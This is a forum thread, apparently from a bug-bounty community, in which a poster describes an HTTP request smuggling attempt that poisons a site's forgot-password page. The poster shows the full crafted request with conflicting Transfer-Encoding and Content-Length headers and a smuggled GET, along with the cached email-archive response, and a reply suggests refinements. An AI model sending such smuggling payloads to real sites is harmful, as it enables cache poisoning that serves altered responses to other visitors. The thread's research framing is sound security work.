HTTP Request Smuggling Question

After reading up a little bit on HTTP Request Smuggling, I decided to try it for a bug bounty site I was working on. I found some weird behavior that I’ve never seen before. The response from my smuggle is an RFC 822 message. It looks like I can poison the /ForgotPassword.aspx endpoint by putting a random parameter. Example: /ForgotPassword.aspx?notreal=123456. Anyone that visits that endpoint will just have a .eml file download, which is the RFC 822 message I was mentioning. It’s just a random message from November 2015. In the message, unfortunately, there is nothing sensitive. There are a few .js files, but I already found those before-hand and there’s nothing there. Is there a way that I can manipulate this further? It seems that anything I try, either the server times out or it just consistently presents me with that RFC 822 message. Here is an example of the request and RFC 822 response:

“RFC 822” mention count:

  • 5

Request:

POST /ForgotPassword.aspx?notreal=123456 HTTP/1.1
 Transfer-Encoding: chunked
Host: sumwebsite.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Cache-Control: max-age=0
Referer: https://sumwebsite.com/ForgotPassword.aspx
Content-Type: application/x-www-form-urlencoded
Cookie: sumcookie=sumvalue
Content-Length: 721
Connection: keep-alive

283
dy5t1=x&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%sumvalue&__VIEWSTATEGENERATOR=sumvalue&__EVENTVALIDATION=sumvalue&txtEmail=a@b.com&btnReturnLogin=Return+to+Login

GET /randomstring HTTP/1.1
X-Ignore: X

Response (RFC 822 message):

HTTP/1.1 200 OK
Content-Type: message/rfc822
Last-Modified: Tue, 03 Nov 2015 23:38:21 GMT
Accept-Ranges: bytes
ETag: "4d881b99016d11:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Frame-Options: SAMEORIGIN
Date: Fri, 10 Jan 2020 03:17:04 GMT
Content-Length: 8875

From: "Saved by Internet Explorer 11"
Subject: Login
Date: Tue, 3 Nov 2015 17:38:21 -0600
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0000_01D1165E.6EE6C750"
X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01D1165E.6EE6C750
Content-Type: text/html;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://localhost:1626/Error.aspx

=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" =
""><HTML><HEAD><META=20
content=3D"IE=3D5.0000" http-equiv=3D"X-UA-Compatible">
<TITLE>Login</TITLE> =20
<META http-equiv=3D"Content-Type" content=3D"text/html; =
charset=3Dutf-8">
<META name=3D"GENERATOR" content=3D"MSHTML 11.00.9600.18015"> =20
<META name=3D"CODE_LANGUAGE" content=3D"C#"> =20
<META name=3D"vs_defaultClientScript" content=3D"JavaScript"> =20
<META name=3D"vs_targetSchema" =
content=3D"http://schemas.microsoft.com/intellisense/ie5">
<LINK id=3D"linkStyle" href=3D"http://localhost:1626/StyleSheet.css" =
rel=3D"stylesheet"=20
type=3D"text/css"> =20
<SCRIPT language=3D"javascript" =
src=3D"http://localhost:1626/JavaScriptFunctions.js" =
type=3D"text/javascript"></SCRIPT>
</HEAD>=20
<BODY>
<TABLE width=3D"775" border=3D"0" cellspacing=3D"0" cellpadding=3D"0">
  <TBODY>
  <TR>
    <TD>&nbsp;</TD>
    <TD valign=3D"top"><IMG name=3D"Image55" width=3D"283" height=3D"68" =
src=3D"http://localhost:1626/Images/logo_un.gif"></TD></TR></TBODY></TABL=
E>
<P>        Ooops!!! Please contact your administrator.</P></BODY></HTML>

------=_NextPart_000_0000_01D1165E.6EE6C750
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-Location: http://localhost:1626/Images/logo_un.gif

R0lGODlhGwFEADAAACwAAAAAGwFEAIcAAAAAADMAAGYAAJkAAMwAAP8AKwAAKzMAK2YAK5kAK8wA
K/8AVQAAVTMAVWYAVZkAVcwAVf8AgAAAgDMAgGYAgJkAgMwAgP8AqgAAqjMAqmYAqpkAqswAqv8A
1QAA1TMA1WYA1ZkA1cwA1f8A/wAA/zMA/2YA/5kA/8wA//8zAAAzADMzAGYzAJkzAMwzAP8zKwAz
KzMzK2YzK5kzK8wzK/8zVQAzVTMzVWYzVZkzVcwzVf8zgAAzgDMzgGYzgJkzgMwzgP8zqgAzqjMz
qmYzqpkzqswzqv8z1QAz1TMz1WYz1Zkz1cwz1f8z/wAz/zMz/2Yz/5kz/8wz//9mAABmADNmAGZm
AJlmAMxmAP9mKwBmKzNmK2ZmK5lmK8xmK/9mVQBmVTNmVWZmVZlmVcxmVf9mgABmgDNmgGZmgJlm
gMxmgP9mqgBmqjNmqmZmqplmqsxmqv9m1QBm1TNm1WZm1Zlm1cxm1f9m/wBm/zNm/2Zm/5lm/8xm
//+ZAACZADOZAGaZAJmZAMyZAP+ZKwCZKzOZK2aZK5mZK8yZK/+ZVQCZVTOZVWaZVZmZVcyZVf+Z
gACZgDOZgGaZgJmZgMyZgP+ZqgCZqjOZqmaZqpmZqsyZqv+Z1QCZ1TOZ1WaZ1ZmZ1cyZ1f+Z/wCZ
/zOZ/2aZ/5mZ/8yZ///MAADMADPMAGbMAJnMAMzMAP/MKwDMKzPMK2bMK5nMK8zMK//MVQDMVTPM
VWbMVZnMVczMVf/MgADMgDPMgGbMgJnMgMzMgP/MqgDMqjPMqmbMqpnMqszMqv/M1QDM1TPM1WbM
1ZnM1czM1f/M/wDM/zPM/2bM/5nM/8zM////AAD/ADP/AGb/AJn/AMz/AP//KwD/KzP/K2b/K5n/
K8z/K///VQD/VTP/VWb/VZn/Vcz/Vf//gAD/gDP/gGb/gJn/gMz/gP//qgD/qjP/qmb/qpn/qsz/
qv//1QD/1TP/1Wb/1Zn/1cz/1f///wD//zP//2b//5n//8z///8AAAAAAAAAAAAAAAAI/wADCBxI
sKDBgwgTKlzIsKHDhwv3SZxIsaLFixgzatzIsaPHjyBBQhxJsqTJkyZDqlzJsqXLlxxRypxJs2ZE
mDhz6tzZ0qbPn0BH8hxKtOjQoEiTKg1gtKnTpx6XSp0qE6rVq1apat3qEKvXrzy5ih1bEKzZsyzJ
qhWLtq3bjWvjUn1Lt65EuXiV2t3bNq9foHwDg/1LuCbHAzIayECAg7EDHD80ZVxW4cGPCssoPqgA
hLPnHxZ+wImG8UEO0w5yPF4tw0EMxheVjTkwEEEmi2NiOJBxoLFu3r53H5C8L4DwNBkR/D4Qs7Dz
k81pS0dAHcEBBMgtanrA/YEyzd3Dh/938OCig/MIHFQPgCCAdPcWcQg8QJ+2wNsT5bvf/75/APzv
MRXbfAGM0dxzCEIU0wEC1Gfdg+mlZxEo5D3gQGYTbaZhZRyGhwBpFEWoHnXXTeceAhXN95519uGQ
n4Mn0sZig7RNIlEm7tH2nUVv5BjAjholKGRXcNHH3kDXVadeDhVt1x2Q+4g3nngOVBQhif4hSZGP
7SHJYgDE6UegjPbZF8AbEi2zXwDZpXidQB0NKadC0QWAAyjEaKJJGvRVhwAoFClD3nkYSkReZT8o
owkoi/4w6AMIwBGiiIrqaWkmmmA6URoCWXemMtEo02V7AEhEDKaZ7ukjqphmUiiZArr/6Z6LB85p
60ALttdmflfSKpEmCFiYAJQWWmiERcs8WuVEEfYWlZE/VoRDfWdehGOXGnFqJIgT4fgmlBndKi6c
cOUoxkUlUkcRKOlZCGWw3P1w0Q/pqTcpg75qBI2Pu05UlnY+gpvifv3ytl9U4966IG39SjRbegFw
C+yIhe4zaGoXwRGsuhMl6SxHmrjXIHEVpWFyGvl2uya36L7J3JZHphxuwrZyBICnMu/T47cTsUse
Au+qZ9m8zYboYEfe6rjStUpnxOnBE4VspMAY0VxzuQxfJLV1xERNnXrvWoidRfVcN+KWOHekLbkq
aUvbRtGs+iLUcVotZ64HnAuwp4Ca/5rknyGql9oyyhCuzBtXIoBmxwyaCYBAjwcAAJCcesqS1AJR
TdF7vp5o50d2312kQA3vk3S0v3pcsZIPMujng272aSS1b2/qI0vetgfNRpXXrgx/ml8U+pA205gz
Me+RDCzP/o44Ynrp0meRyCu+6WmhlUt++XwAVHzRvvtJ9nTtCA+P4MJsau05kFsfAGX0rZM49vT1
CYBQqbYbydLO7dGDvos+ytnMzPecBTVIbxXJRPJ65qOu+etBDkBZGhpkOXQdqQH7CBU0lgENUEGJ
T3QLiQL3472L9I4pnnNg+QhYGPSV7nRAyh3q7vImBLotffSjjQATGLCVTMJHu9vI7/+kIx/9iYSF
zjHgx0oWgAbN8Hf7gVIT6ZMv6uHPTQ2SAdKONEOKkOY7VAtZl0poQU+l7YhIJIwLW2bEX/XQX0Zi
0kTQ4CM5bslIOwyUj0hGkchpj0c+0ofacvSe4FUtjWocXd4sQgzqxcp0jQPTHWeVovYg4IoP1OGz
QujG/diRIjgiYUegaEnygQ6Rf8kVDvNnpMW5cWp3bE/KiqjJO9aSI6U0DigJ2UWVXad7z6JWHg+J
yrzUyUxI4mJFQEEgKRJxeu0x5T5gdZN96ENF89EP5zASsih6RFtO5OMKixmXhUWzPujMHA+ZR0Pa
GEhaAbQle2g3O+lNZGc+ypGnHsnLxDcJcpS8pAjK8BMkcuLFZueMpIzUWRHkeROODcqZFV81z/7U
kz1N2s+MyqQRTUgHmAiT5UQUNQYblcug5dyIHw9ygNLtQxORA4AK9+HHnIkJPndxyMvgmczh8M6P
hqyIDyDHRzGA4p0FRelaOEK4UGnQqRwp3AYrItXgKUMZGwQSBz3oVKdy8KsZURSmyBibZYQqJGBt
aN2UqhbBuPUqbF3qW+falLi2la54PYpdx5LXvgZKE8NQBjGCOr29ssWveT2VMgQZDX3UQ1H/pzTs
VhCL1zRUwH8VicYDXHlSyc6Fsm9VRia4AwQ4wMEIQODOHfZB2OJ4Visc8RUCn4LT/ASVGOdSBg5w
IAYc3AYHWtzHblHWuZ0GSRlpIGhFHkCPaMChAhbgzGgmogaWEfO1UrEZrWJFWCjN9Du2CRSGTOav
7+DgqhSZ6TQFhFwcZAYHg3XRVX+0I/KaKlAS+aByR0oeTVh3InCQV62wq5eNIEAMkmGKGBjDlFLp
iaYSuc4YHMwmpsgHaHbKjgx26yL63CZk551NDvB3pkcCTY7EoJVuz0ucR9ImUy21cG8QI5/i7CMN
msCBZHCQHWK8IboPiG5pjWAE7gBKnMIj/3B24WJj5ggoDSmeZogj/CtaKfDG+BEDhnR7l5eadJoS
ge8+xpDjTBADDXJEQxqUgb8c3wVlNoZw1LKzDI8Kt2svY4oD6oGG26BwIg4YLBw605kgT1cikuqs
kpESk32UjTkvM6omxoBmo1KZtWLIhIvci+Aw7yjKYM5Em1523n34IMWLIsY/AzAJPkmGyzjeBzEm
1+VuIQcN52JOqQXEFOakgRLTBLXOHmCEHf03GkAg7KKXYjOJcEq4PBbQ5Ng8Ed7gaB85EEOPlIEG
4kgwwmPY7Y3bhAMy63gfCP6dRyXjZtYyxc2/03QOXoZJTZyLx8+WwXcOQJpeoxtNbJZYGtS4YwEj
qMG0mjAtsWU94GX/hCP/haxEQPSql05ksGmiCB8xbi0vRm2k+HV01EhTj4xrDbMgKjlr9+G9R+4J
FAEOMnSBYIRQ5BfJhXU4SQDA8577vOdEQRFo27ZfHDzAvxiBgyb+OfSmO32uoBj4ZkRj2tPCQR84
f7rWt96WNLzBUov6jj6IkWium/3sZ1FGDn7wdT3BIdZoj7vcsSLYTJi5tXPPu973zve++/3vgA+8
4AdP+MIb/vCIT7ziF8/4xjv+8ZCPvOQnT/nKW/7ymM+85isSEAA7

------=_NextPart_000_0000_01D1165E.6EE6C750
Content-Type: text/css;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://localhost:1626/StyleSheet.css

body {
=09
}
.menuLink {
color: rgb(0, 0, 0); font-family: Arial; font-size: 10pt;
}
.menuLink:active {
color: rgb(0, 0, 0); font-family: Arial; font-size: 10pt;
}
.menuLink:visited {
color: rgb(0, 0, 0); font-family: Arial; font-size: 10pt;
}
.menuLink:hover {
color: navy; font-family: Arial; font-size: 10pt;
}
.standardLink {
color: blue; font-family: Arial; font-size: 10pt;
}
.standardLink:active {
color: blue; font-family: Arial; font-size: 10pt;
}
.standardLink:visited {
color: blue; font-family: Arial; font-size: 10pt;
}
.standardLink:hover {
color: navy; font-family: Arial; font-size: 10pt;
}
h2 {
color: rgb(0, 0, 0); font-family: Arial; font-size: 18pt;
}
h3 {
color: rgb(0, 0, 0); font-family: Arial; font-size: 12pt;
}
td {
color: rgb(0, 0, 0); font-family: Arial; font-size: 10pt; margin-left: =
40px;
}
.HeaderText {
color: rgb(0, 0, 0); font-family: Arial; font-size: 12pt; font-weight: =
bold; background-color: rgb(200, 200, 200);
}
.HeaderTextSmall {
color: rgb(0, 0, 0); font-family: Arial; font-size: 11pt; font-weight: =
bold;
}
.MenuHeaderText {
color: rgb(0, 0, 0); font-family: Arial; font-size: 12pt; font-weight: =
bold;
}
.LoginHeaderText {
color: rgb(0, 0, 0); font-family: Arial; font-size: 12pt; font-weight: =
bold;
}
.LoginText {
color: rgb(0, 0, 0); font-family: Arial; font-size: 12pt; font-weight: =
bold;
}

------=_NextPart_000_0000_01D1165E.6EE6C750
Content-Type: application/octet-stream
Content-Transfer-Encoding: 7bit
Content-Location: http://localhost:1626/JavaScriptFunctions.js

function SaveScroll()
{
document.all('txtXPos').value = window.document.body.scrollLeft;
document.all('txtYPos').value = window.document.body.scrollTop;
return;
}


function SetJSFocus()
{
var XPos = document.all('txtXPos').value;
var YPos = document.all('txtYPos').value;
window.document.body.scrollLeft = XPos;
window.document.body.scrollTop = YPos;
}

function DisableEnter()
{
//alert('Key hit');
if (window.event.keyCode == 13)
{
event.returnValue=false;
event.cancel = true;
//alert('Enter hit');
}
}

function CheckPhoneForSameNumber(oSrc, args)
{
args.IsValid = (args.Value != '111-111-1111' &&
args.Value != '222-222-2222' &&
args.Value != '333-333-3333' &&
args.Value != '444-444-4444' &&
args.Value != '555-555-5555' &&
args.Value != '666-666-6666' &&
args.Value != '777-777-7777' &&
args.Value != '888-888-8888' &&
args.Value != '999-999-9999' &&
args.Value != '000-000-0000');
}


------=_NextPart_000_0000_01D1165E.6EE6C750--

I haven’t played with request smuggling, but I think that HTTP/1.1 expects a Host header. Maybe add the Host header to GET /randomstring or use HTTP/1.0 or HTTP/0.9.
Also, do not forget about the new lines \r\n\r\n at the bottom of a GET request.

My suggestions are based in the message from the response Ooops!!! Please contact your administrator..

Hello @stefanofinding, thank you for the response! Very much appreciated good sir. I tested a couple other things and I couldn’t get anything out of it, so I decided to pack my bags and move on. Thanks again!

1 Like